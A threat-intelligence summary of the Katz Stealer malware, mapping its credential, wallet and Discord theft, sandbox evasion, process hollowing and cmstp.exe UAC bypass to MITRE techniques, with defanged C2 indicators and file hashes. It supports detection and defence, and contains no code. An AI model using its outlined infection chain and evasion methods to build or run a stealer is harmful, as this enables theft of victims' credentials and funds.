Threat Research

Katz Stealer Threat Analysis – Nextron Systems

iocOne
Katz Stealer Threat Analysis – Nextron Systems

Katz Stealer is a credential-stealing malware as a service that targets browsers, communication apps, crypto wallets, and gaming platforms to exfiltrate sensitive data using sophisticated evasion and injection techniques. Its infection chain involves obfuscated JavaScript and PowerShell scripts, .NET loader payloads, process hollowing, UAC bypass, and geofencing, with detailed YARA and Sigma detection rules available. #KatzStealer #ProcessHollowing #DiscordHijacking #AppBoundEncryption

Keypoints

  • Katz Stealer targets popular browsers (Chrome, Edge, Brave, Firefox) to steal passwords, cookies, and session tokens by decrypting app-bound encrypted data.
  • The malware hijacks communication apps like Discord via modification of app.asar files to execute remote JavaScript code and maintain persistent backdoors.
  • Katz Stealer exfiltrates cryptocurrency wallet files and extensions, supporting over a dozen wallet types and recursively copying wallet directories.
  • It employs advanced evasion tactics including geofencing (excluding CIS countries), virtual machine and sandbox detection through BIOS checks, screen resolution, and uptime.
  • The infection chain uses obfuscated JavaScript and base64-encoded PowerShell scripts to download .NET loaders that inject payloads into legitimate processes such as MSBuild via process hollowing.
  • The malware abuses legitimate Windows utilities like cmstp.exe for UAC bypass, enabling elevated execution without triggering prompts.
  • Detection opportunities include monitoring unusual outbound network traffic to Katz Stealer C2 servers, unexpected process creation/injections, headless browser execution, and suspicious temporary files.

MITRE Techniques

  • [T1055] Process Injection – Katz Stealer injects its payload into legitimate processes such as MSBuild via process hollowing to evade detection (‘payload is injected into a legitimate process via Process Hollowing, in this case the MSBuild process’).
  • [T1112] Modify Registry – The malware queries the BIOS registry key HKLMHARDWAREDESCRIPTIONSystemBIOS to detect virtual environments (‘queries the system BIOS information through registry key HKLMHARDWAREDESCRIPTIONSystemBIOS’).
  • [T1086] PowerShell – Obfuscated and base64-encoded PowerShell scripts are used to download payloads and execute code directly in memory (‘second stage is an obfuscated and base64-encoded PowerShell script… executed through PowerShell using hidden window flags’).
  • [T1204.002] User Execution: Malicious File – Infection initiates via malicious gzip files containing obfuscated JavaScript that trigger PowerShell execution (‘JavaScript in gzip files which, when opened, trigger the download of a PowerShell script’).
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass User Access Control – Katz Stealer abuses the legitimate utility cmstp.exe to bypass UAC without user prompts (‘UAC bypass abusing cmstp.exe, a legitimate Windows utility’).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – The malware uses legitimate Windows utilities like cmstp.exe to hide malicious activities (‘abusing legitimate Windows utilities (e.g., cmstp.exe)’).
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – Uses screen resolution and system uptime as anti-sandbox techniques (‘Sandbox evasion via screen resolution and system uptime analysis’).
  • [T1016] System Network Configuration Discovery – Extracts WiFi credentials using netsh and VPN configurations for further access (‘exploiting network and system data, including WiFi credentials via netsh and VPN setups’).
  • [T1113] Screen Capture – Captures screenshots on command from C2 server using BitBlt function and uploads images (‘malware uses BitBlt function to take a screenshot of the entire screen’).
  • [T1056.001] Input Capture: Keylogging – Clipboard monitoring capability to capture clipboard data on demand (‘ability to monitor the system clipboard and send contents to C2 server’).

Indicators of Compromise

  • [C2 Addresses] Command and control servers – 185.107.74[.]40, 31.177.109[.]39, twist2katz[.]com, pub-ce02802067934e0eb072f69bf6427bf6[.]r2[.]dev
  • [Related Domains] Katz Stealer infrastructure – katz-stealer[.]com, katzstealer[.]com
  • [User-Agent] Unique outbound HTTP header – Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 katz-ontop
  • [Filenames] Temporary malware artifacts – AppDataLocalTempkatzontop.dll, AppDataLocalTempreceiveddll.dll, AppDataRoamingdecryptedchromekey.txt, AppDataRoamingdecryptedbravekey.txt, AppDataRoamingdecryptededgekey.txt
  • [File Hashes] Malware components – Gzip archive (22af84327cb8ecafa44b51e9499238ca2798cec38c2076b702c60c72505329cb), PowerShell script (fb2b9163e8edf104b603030cff2dc62fe23d8f158dd90ea483642fce2ceda027), .NET UAC bypass binary (4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7), and multiple stealer payloads
  • [Payloads] DLL and executable modules – katzontop.dll, receiveddll.dll and various stealer payload binaries with unique SHA256 hashes

Read more: https://www.nextron-systems.com/2025/05/23/katz-stealer-threat-analysis/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint